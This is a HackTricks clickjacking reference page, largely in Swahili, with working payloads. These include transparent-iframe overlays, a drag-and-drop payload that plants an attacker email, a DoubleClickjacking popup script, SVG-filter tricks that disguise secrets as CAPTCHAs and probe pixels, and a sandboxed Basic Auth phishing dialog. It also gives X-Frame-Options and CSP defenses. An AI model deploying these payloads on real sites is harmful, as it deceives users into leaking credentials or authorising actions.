Clickjacking

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Clickjacking ni nini

Katika shambulio la clickjacking, mtumiaji anadanganywa ili kubofya kipengele kwenye ukurasa wa wavuti ambacho kinaweza kuwa kisichoonekana au kimetengenezwa kuonekana kama kipengele tofauti. Udanganyifu huu unaweza kusababisha matokeo yasiyokusudiwa kwa mtumiaji, kama vile kupakuliwa kwa malware, kuelekezwa kwa tovuti zenye madhara, kutoa credentials au taarifa nyeti, uhamisho wa pesa, au kununua bidhaa mtandaoni.

Njia ya kujaza fomu awali

Wakati mwingine inawezekana kujaza thamani za mashamba ya fomu kwa kutumia vigezo vya GET wakati wa kuipakia ukurasa. Mshambuliaji anaweza kutumia tabia hii kujaza fomu na data yoyote na kutuma payload ya clickjacking ili mtumiaji abofye kitufe cha Submit.

Kujaza fomu kwa kutumia Drag&Drop

Ikiwa unahitaji mtumiaji kujaza fomu lakini hautaki kumwomba moja kwa moja aingize taarifa maalum (kama barua pepe au nywila maalum unayojua), unaweza kumwomba tu aendeleze Drag&Drop kitu kitakachoiandika data unayodhibiti kama inavyoonekana katika this example.

Msingi wa payload

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Payload ya hatua nyingi

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click payload

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Ikiwa umebaini XSS attack that requires a user to click kwenye kipengele fulani ili trigger XSS na ukurasa una vulnerable to clickjacking, unaweza kuitumia kumdanganya user kubofya kitufe/kiungo.
Mfano:
Umegundua self XSS katika baadhi ya maelezo ya faragha ya akaunti (maelezo ambayo only you can set and read). Ukurasa ulio na form ya kuweka maelezo haya una vulnerable to Clickjacking na unaweza prepopulate form kwa GET parameters.
Attacker anaweza kuandaa Clickjacking attack kwa ukurasa huo prepopulating form na XSS payload na tricking the user into Submit form. Kwa hivyo, when the form is submitted na values zinapobadilishwa, the user will execute the XSS.

DoubleClickjacking

Firstly explained in this post, hii technique inaomba the victim kubofya mara mbili kwenye kitufe cha ukurasa maalum uliowekwa mahali fulani, na kutumia tofauti za timing kati ya mousedown na onclick events ili kupakia ukurasa wa the victim wakati wa double click hivyo the victim actually clicks a legit button in the victim page.

Mfano unaweza kuangalia kwenye video hii: https://www.youtube.com/watch?v=4rGvRRMrD18

Mfano wa code unaweza kupatikana kwenye this page.

Warning

Hii technique inaruhusu kumdanganya the user kubofya mahali 1 kwenye the victim page kwa kupita kila kinga dhidi ya clickjacking. Kwa hivyo attacker anahitaji kutafuta sensitive actions that can be done with just 1 click, like OAuth prompts accepting permissions.

Baadhi ya PoCs hutupa iframes kabisa na kuweka background popup iliyopangwa chini ya cursor. Attacker page inafuatilia mousemove na hutumia popup ndogo (window.open) inayosogezwa kwa moveTo() wakati itakuwa same-origin; mara tu inapoenea, inarejeshwa kwa target origin hivyo click inayofuata inaangukia kwenye kitufe halisi. Kwa sababu cross‑origin moveTo() inazuia, popup inavurushwa kwa muda mfupi kwenda attacker origin kwa repositioning, kisha location/history.back() inarejesha kwa target. Ili kuonekana target wakati wa click, attacker anaweza kufungua tena popup with the same window name ili kuileta mbele bila kubadilisha URL.

<script>
let w;
onclick = () => {
if (!w) w = window.open('/shim', 'pj', 'width=360,height=240');
onmousemove = e => { try { w.moveTo(e.screenX, e.screenY); } catch {} };
// When ready, refocus the already-loaded popup
window.open('', 'pj');
};
</script>

SVG Filters / Cross-Origin Iframe UI Redressing

Matoleo ya kisasa ya Chromium/WebKit/Gecko yanaruhusu CSS filter:url(#id) kutumika kwenye cross-origin iframes. Pikseli za rasterized za iframe zinaonekana kwenye grafu ya SVG filter kama SourceGraphic, hivyo primitives kama feDisplacementMap, feBlend, feComposite, feColorMatrix, feTile, feMorphology, n.k. zinaweza kubadilisha kiholela UI ya victim kabla mtumiaji hajaona, hata kama attacker kamwe haigusi DOM. Filter rahisi ya mtindo wa Liquid-Glass inaonekana kama:

<iframe src="https://victim.example" style="filter:url(#displacementFilter4)"></iframe>
  • Vifaa muhimu: feImage loads attacker bitmaps (e.g., overlays, displacement maps); feFlood builds constant-color mattes; feOffset/feGaussianBlur refine highlights; feDisplacementMap refracts/warps text; feComposite operator="arithmetic" implements arbitrary per-channel math (r = k1*i1*i2 + k2*i1 + k3*i2 + k4), which is enough for contrast boosting, masking, and AND/OR operations; feTile crops and replicates pixel probes; feMorphology grows/shrinks strokes; feColorMatrix moves luma into alpha to build precise masks.

Kugeuza secrets kuwa CAPTCHA-style prompts

Ikiwa endpoint inayoweza kuwekewa frame inatoa secrets (tokens, reset codes, API keys), mshambuliaji anaweza kuziibadilisha ili zifanana na CAPTCHA na kulazimisha uandishi kwa mkono:

<svg width="0" height="0">
<filter id="captchaFilter">
<feTurbulence type="turbulence" baseFrequency="0.03" numOctaves="4" result="noise" />
<feDisplacementMap in="SourceGraphic" in2="noise" scale="6" xChannelSelector="R" yChannelSelector="G" />
</filter>
</svg>
<iframe src="https://victim" style="filter:url(#captchaFilter)"></iframe>
<input pattern="^6c79 ?7261 ?706f ?6e79$" required>

The distorted pixels fool the user into “solving” the captcha inside the attacker-controlled <input> whose pattern enforces the real victim secret.

Kurekebisha muktadha wa pembejeo za mwathirika

Filters zinaweza kufuta kwa ufanisi maandishi ya placeholder/validation huku zikihifadhi vibofyo vya mtumiaji. Mfano mmoja wa workflow:

  1. feComposite operator="arithmetic" k2≈4 huongeza mwangaza hadi maandishi ya msaada ya kijivu yatoke kuwa nyeupe.
  2. feTile inaweka eneo la kazi ndani ya mraba wa <input>.
  3. feMorphology operator="erode" huongeza unene wa alama/glyphs za giza zilizobonyezwa na mwathirika na kuzihifadhi kupitia result="thick".
  4. feFlood huunda sahani nyeupe, feBlend mode="difference" pamoja na thick, na feComposite k2≈100 ya pili huibadilisha kuwa matte ya luma kali.
  5. feColorMatrix inahamisha luma hiyo kuwa alpha, na feComposite in="SourceGraphic" operator="in" huhifadhi tu alama zilizowekwa na mtumiaji.
  6. Mchanganyiko mwingine feBlend in2="white" pamoja na ukata mwembamba hutoa kisanduku cha maandishi safi, kisha mshambulizi anaweka lebo zake za HTML (mfano, “Enter your email”) wakati iframe iliyo fichwa bado inatekeleza sera ya nywila ya asili ya mwathirika.

Safari inashindwa na feTile; athari sawa inaweza kuundwa kwa mattes za nafasi zilizojengwa kwa feFlood + feColorMatrix + feComposite kwa payloads za WebKit pekee.

Uchunguzi wa pikseli, mantiki na mashine za hali

Kwa kukata eneo la 2–4 px kwa feTile na kulitila hadi 100% ya viewport, mshambulizi anageuza rangi iliyochaguliwa kuwa texture ya fremu nzima ambayo inaweza kuwekwa kwenye threshold kuwa maski ya boolean:

<filter id="pixelProbe">
<feTile x="313" y="141" width="4" height="4" />
<feTile x="0" y="0" width="100%" height="100%" result="probe" />
<feComposite in="probe" operator="arithmetic" k2="120" k4="-1" />
<feColorMatrix type="matrix" values="0 0 0 0 0  0 0 0 0 0  0 0 0 0 0  0 0 1 0 0" result="mask" />
<feGaussianBlur in="SourceGraphic" stdDeviation="2" />
<feComposite operator="in" in2="mask" />
<feBlend in2="SourceGraphic" />
</filter>

Kwa rangi yoyote, rejea ya feFlood (mfano, #0B57D0) pamoja na feBlend mode="difference" na composite nyingine ya arithmetic (k2≈100, k4 kama uvumilivu) hutengeneza nyeupe tu wakati pikseli iliyochunguzwa inafanana na rangi lengwa. Kuingiza masks hizi kwenye feComposite na k1..k4 zilizobadilishwa hutoa milango ya mantiki: AND kwa k1=1, OR kwa k2=k3=1, XOR kupitia feBlend mode="difference", NOT kwa kuchanganya dhidi ya nyeupe. Kuchain milango kunaunda full adder ndani ya grafu ya filter, kuonyesha kwamba pipeline ni functionally complete.

Washambulizi wanaweza kwa hivyo kusoma state ya UI bila JavaScript. Mifano ya booleans kutoka kwenye modal workflow:

  • D (dialog visible): chunguza pembe iliyofifia na linganisha dhidi ya nyeupe.
  • L (dialog loaded): chunguza kuratibu ambapo button inaonekana mara inapo tayari.
  • C (checkbox checked): linganisha pikseli ya checkbox dhidi ya active blue #0B57D0.
  • R (red success/failure banner): tumia feMorphology na vikwazo vya red ndani ya mraba wa banner.

Kila hali iliyotambuliwa inaweka gate kwa overlay bitmap tofauti iliyowekwa kupitia feImage xlink:href="data:...". Kufunika bitmap hizo kwa D, L, C, R kunahakikisha overlays zinalingana na dialog halisi na kupeleka mwathiriwa kupitia workflows zenye hatua nyingi (urejesho wa nywila, idhini, uthibitisho wa hatua za kuharibu) bila kamwe kufichua DOM.

Sandboxed iframe Basic Auth dialog (no allow-popups)

A sandboxed iframe without allow-popups can still surface a browser-controlled HTTP Basic Authentication modal when a load returns 401 with WWW-Authenticate. Dialogu inazaliwa na tabaka la networking/auth la browser (si JS alert/prompt/confirm), kwa hivyo vikwazo vya popup ndani ya sandbox haviwezi kuzuiliwa. Ikiwa unaweza kuscript iframe (mfano, sandbox="allow-scripts" ) unaweza kuipeleka kwenye endpoint yoyote inayotoa changamoto ya Basic Auth:

<iframe id="basic" sandbox="allow-scripts"></iframe>
<script>
basic.src = "https://httpbin.org/basic-auth/user/pass"
</script>

Mara tu jibu linapofika, browser inamuuliza mtumiaji cheti za uthibitisho ingawa popups zimezuiwa. Kufungia origin ya kuaminika kwa hila hii kunawawezesha UI redress/phishing: modal zisizotarajiwa ndani ya widget “sandboxed” zinaweza kumchanganya mtumiaji au kuamsha password managers kutoa vithibitisho vilivyohifadhiwa.

Viendelezi vya browser: DOM-based autofill clickjacking

Mbali na iframing ya kurasa za mwathiriwa, mshambuliaji anaweza kulenga vipengele vya UI vya browser extension vinavyoingizwa kwenye ukurasa. Password managers huonyesha dropdowns za autofill karibu na inputs zilizopokelewa; kwa kuweka fokus kwenye uwanja unaodhibitiwa na mshambuliaji na kuficha/kuingilia dropdown ya extension (opacity/overlay/top-layer tricks), klik iliyotolewa kwa kulazimishwa na mtumiaji inaweza kuchagua kipengee kilichohifadhiwa na kujaza data nyeti kwenye inputs zinazoendeshwa na mshambuliaji. Tofauti hii haihitaji kuonyeshwa kwa iframe na inafanya kazi kabisa kupitia manipulation ya DOM/CSS.

Mfano wa ulimwengu halisi: Dashlane ilifichua passkey dialog clickjacking issue (Aug 2025) ambapo XSS on the relying-party domain iliruhusu mshambuliaji kuweka HTML juu ya dialog ya passkey ya extension. Klik kwenye kipengee cha mshambuliaji ingetenda kuendelea na login halali ya passkey (passkey yenyewe haikutolewa), ikibadilisha kwa ufanisi UI-redress kuwa upatikanaji wa akaunti ikiwa RP tayari inakabiliwa na script injection.

Mikakati ya Kupunguza Clickjacking

Ulinzi upande wa mteja

Skripti zinazotekelezwa upande wa mteja zinaweza kuchukua hatua za kuzuia Clickjacking:

  • Kuhakikisha dirisha la programu ndilo dirisha kuu au dirisha la juu.
  • Kufanya frames zote zionekane.
  • Kuzuia klik kwenye frames zisizoonekana.
  • Kugundua na kutoa onyo kwa watumiaji kuhusu jaribio la Clickjacking.

Walakini, skripti hizi za kuvunja fremu zinaweza kupitishwa:

  • Browsers’ Security Settings: Baadhi ya browsers zinaweza kuziba skripti hizi kulingana na mipangilio yao ya usalama au ukosefu wa msaada wa JavaScript.
  • HTML5 iframe sandbox Attribute: Mshambuliaji anaweza kufifisha skripti za frame buster kwa kuweka sifa ya sandbox na thamani allow-forms au allow-scripts bila allow-top-navigation. Hii inazuia iframe kuthibitisha ikiwa ndiyo dirisha la juu, kwa mfano,
<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.

Kinga upande wa seva

X-Frame-Options

The X-Frame-Options HTTP response header informs browsers about the legitimacy of rendering a page in a <frame> or <iframe>, helping to prevent Clickjacking:

  • X-Frame-Options: deny - Hakuna domeni inaweza kuweka yaliyomo kwenye frame.
  • X-Frame-Options: sameorigin - Tovuti ya sasa pekee inaweza kuweka yaliyomo kwenye frame.
  • X-Frame-Options: allow-from https://trusted.com - Uri iliyotajwa pekee inaweza kuweka ukurasa kwenye frame.
  • Note the limitations: if the browser doesn’t support this directive, it might not work. Some browsers prefer the CSP frame-ancestors directive.

Content Security Policy (CSP) frame-ancestors directive

frame-ancestors directive in CSP ni njia inayopendekezwa kwa ulinzi dhidi ya Clickjacking:

  • frame-ancestors 'none' - Inafanana na X-Frame-Options: deny.
  • frame-ancestors 'self' - Inafanana na X-Frame-Options: sameorigin.
  • frame-ancestors trusted.com - Inafanana na X-Frame-Options: allow-from.

For instance, the following CSP only allows framing from the same domain:

Content-Security-Policy: frame-ancestors 'self';

Further details and complex examples can be found in the frame-ancestors CSP documentation and Mozilla’s CSP frame-ancestors documentation.

Content Security Policy (CSP) na child-src na frame-src

Content Security Policy (CSP) ni hatua ya usalama inayosaidia kuzuia Clickjacking na mashambulizi mengine ya code injection kwa kubainisha vyanzo ambavyo browser inapaswa kuruhusu kupakia yaliyomo.

frame-src Directive

  • Defines valid sources for frames.
  • More specific than the default-src directive.
Content-Security-Policy: frame-src 'self' https://trusted-website.com;

Sera hii inaruhusu fremu kutoka asili ileile (self) na https://trusted-website.com.

child-src Maagizo

  • Ilianzishwa katika CSP ngazi ya 2 ili kuweka vyanzo vinavyokubalika kwa web workers na fremu.
  • Inafanya kazi kama mbadala (fallback) kwa frame-src na worker-src.
Content-Security-Policy: child-src 'self' https://trusted-website.com;

Sera hii inaruhusu frames na workers kutoka kwa asili ile ile (self) na https://trusted-website.com.

Vidokezo vya Matumizi:

  • Uondoaji: child-src inaondolewa polepole kwa ajili ya frame-src na worker-src.
  • Tabia ya Fallback: Ikiwa frame-src haipo, child-src inatumiwa kama fallback kwa frames. Ikiwa zote hazipo, default-src inatumiwa.
  • Ufafanuzi Mkali wa Vyanzo: Jumuisha vyanzo vinavyoaminika tu katika directives ili kuzuia matumizi mabaya.

JavaScript Frame-Breaking Scripts

Ingawa si kamilifu kabisa, JavaScript-based frame-busting scripts zinaweza kutumika kuzuia ukurasa wa wavuti kuwekwa katika fremu. Mfano:

if (top !== self) {
top.location = self.location
}

Kutumia Anti-CSRF Tokens

  • Token Validation: Tumia anti-CSRF tokens katika maombi ya wavuti ili kuhakikisha kwamba ombi linalobadilisha hali limetolewa kwa makusudi na mtumiaji na si kupitia ukurasa uliokuwa Clickjacked.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks